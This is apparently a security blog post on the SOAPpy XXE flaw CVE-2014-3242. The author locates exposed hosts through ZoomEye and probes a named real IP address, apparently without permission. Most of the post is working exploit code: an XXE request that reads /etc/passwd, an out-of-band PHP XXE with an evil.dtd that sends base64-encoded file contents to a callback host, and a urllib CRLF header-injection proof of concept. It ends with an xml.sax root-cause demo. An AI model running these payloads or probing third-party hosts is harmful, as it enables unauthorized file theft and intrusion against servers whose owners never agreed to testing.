
Source
While researching XXE vulnerabilities, I came across a bug on the WooYun mirror that traced back to CVE-2014-3242.
SOAPpy <= 0.12.5 is vulnerable to XXE, and a casual ZoomEye search turns up plenty of candidate hosts.
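For context, the kind of service these searches find is typically nothing more than a stock SOAPpy server. A minimal sketch of one (Python 2 era, since SOAPpy predates Python 3; the echo method is purely illustrative):

```python
# Minimal SOAPpy service of the sort exposed on such hosts (Python 2 era;
# SOAPpy never supported Python 3). The "echo" method is illustrative only.
import SOAPpy

def echo(s):
    return s  # reflects input, so expanded entities come straight back

server = SOAPpy.SOAPServer(("0.0.0.0", 8080))
server.registerFunction(echo)
server.serve_forever()
```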
Testing
123.126.42.100 does indeed have XXE. Next, try reading a file, using the method described here.
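A probe along those lines; this is a sketch, and the port, the method name echo, and the argument element are assumptions to be adapted to whatever the target actually exposes:

```python
# XXE probe for CVE-2014-3242: declare an external entity in the DOCTYPE and
# reference it in the method argument, hoping the response (or a SOAP fault)
# echoes the expansion back. TARGET, port, and method name are placeholders.
import requests

TARGET = "http://123.126.42.100:8080/"

envelope = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soap:Envelope [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <echo><arg>&xxe;</arg></echo>
  </soap:Body>
</soap:Envelope>"""

resp = requests.post(
    TARGET,
    data=envelope,
    headers={"Content-Type": "text/xml; charset=UTF-8", "SOAPAction": '""'},
)
print(resp.status_code)
print(resp.text)
```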
As it turns out, the file contents cannot actually be displayed, because we don't know which function, if any, echoes our input back.
PHP XXE testing
While testing this XXE, I also used vulhub's php_xxe environment to explore the PHP side of things. A few extensions are worth noting:
Many of the libraries that give rise to XXE check whether the requested URL is valid before sending the request, and raise an error if it is not.
Even if nothing is displayed normally, being able to provoke error messages still effectively lets you read files. To work around the display problem, PHP supports pseudo-protocols such as php://filter, which can re-encode the file being read, base64 for example, before the request goes out.
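A sketch of such a request, assuming the vulhub php_xxe target runs locally and we control a callback host; both addresses are placeholders:

```python
# Out-of-band XXE against a vulhub php_xxe style target: the internal DTD
# subset only pulls in the attacker's external DTD; the real work (reading
# the file via php://filter and leaking it in a callback URL) happens in
# evil.dtd, sketched further below.
import requests

TARGET = "http://127.0.0.1:8080/"   # placeholder: the vulhub php_xxe endpoint
ATTACKER = "http://1.2.3.4"         # placeholder: a host we control

payload = f"""<?xml version="1.0"?>
<!DOCTYPE convert [
  <!ENTITY % remote SYSTEM "{ATTACKER}/evil.dtd">
  %remote;
  %int;
  %send;
]>
<root/>"""

requests.post(TARGET, data=payload,
              headers={"Content-Type": "application/xml"})
# The base64-encoded file then shows up in the callback host's access log.
```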
In that request, evil.dtd, hosted on the attacker side, carries the actual exfiltration logic; its contents are sketched next. How other languages would implement the same trick, I don't yet know.
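A matching sketch of evil.dtd; the callback host is again a placeholder, and &#37; is an escaped % needed to nest one parameter-entity declaration inside another:

```python
# evil.dtd, served from the attacker host next to a listener or access log.
# %file reads the target file through php://filter, base64-encoded so that
# newlines cannot break the callback URL; %int declares %send, which fires
# the callback carrying the data.
EVIL_DTD = (
    '<!ENTITY % file SYSTEM '
    '"php://filter/read=convert.base64-encode/resource=/etc/passwd">\n'
    "<!ENTITY % int \"<!ENTITY &#37; send SYSTEM 'http://1.2.3.4/?p=%file;'>\">\n"
)

with open("evil.dtd", "w") as f:
    f.write(EVIL_DTD)
# Serve it with, e.g.: python3 -m http.server 80
```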
Going further
Taking a closer look at the request the target makes, the urllib version is python urllib/1.6. A quick search shows that this urllib suffers from HTTP header injection; details can be found here.
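The published proof of concept for that bug (presumably the issue later assigned CVE-2016-5699, fixed in newer CPython releases) can be reproduced locally, roughly as follows:

```python
# Local reproduction sketch of the urllib header injection: percent-encoded
# CRLF in the host portion of the URL is unquoted before being written into
# the outgoing request, so extra header lines can be smuggled in. Watch the
# raw request with: nc -l 12345   (patched interpreters reject this URL)
import urllib  # Python 2 era urllib

urllib.urlopen(
    "http://127.0.0.1%0d%0aX-Injected:%20header%0d%0aX-Leftover:%20:12345/foo"
)
```

In the XXE setting, the same CRLF sequences would go into the SYSTEM URL of an external entity, so the injected header is emitted by the target's own server-side urllib request.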

Testing the target the same way shows that the same HTTP header injection is indeed present. But because there is no way to observe whether the injected request succeeds, the bug is hard to turn into anything more. Pushing one step deeper: why does SOAPpy produce this vulnerability at all? Reading the SOAPpy source shows that it parses XML with xml.sax, and xml.sax's default parser of that era resolved external entities out of the box; SOAPpy's use of that parser, with its defaults, is exactly what introduces the XXE.
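A minimal demonstration of that behaviour. On the Python 2 interpreters SOAPpy ran on, external general entities were resolved by default; modern Python 3 ships with the feature off, so this sketch enables it explicitly:

```python
# xml.sax's expat reader fetches and expands external general entities when
# feature_external_ges is set; the fetch itself goes through urllib, which is
# why the callbacks observed earlier arrived with a Python-urllib User-Agent.
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

doc = """<?xml version="1.0"?>
<!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<r>&xxe;</r>"""

class Dump(ContentHandler):
    def characters(self, content):
        print(content, end="")

parser = xml.sax.make_parser()
parser.setFeature(feature_external_ges, True)  # the dangerous default of the era
parser.setContentHandler(Dump())
parser.parse(io.StringIO(doc))  # prints the contents of /etc/passwd
```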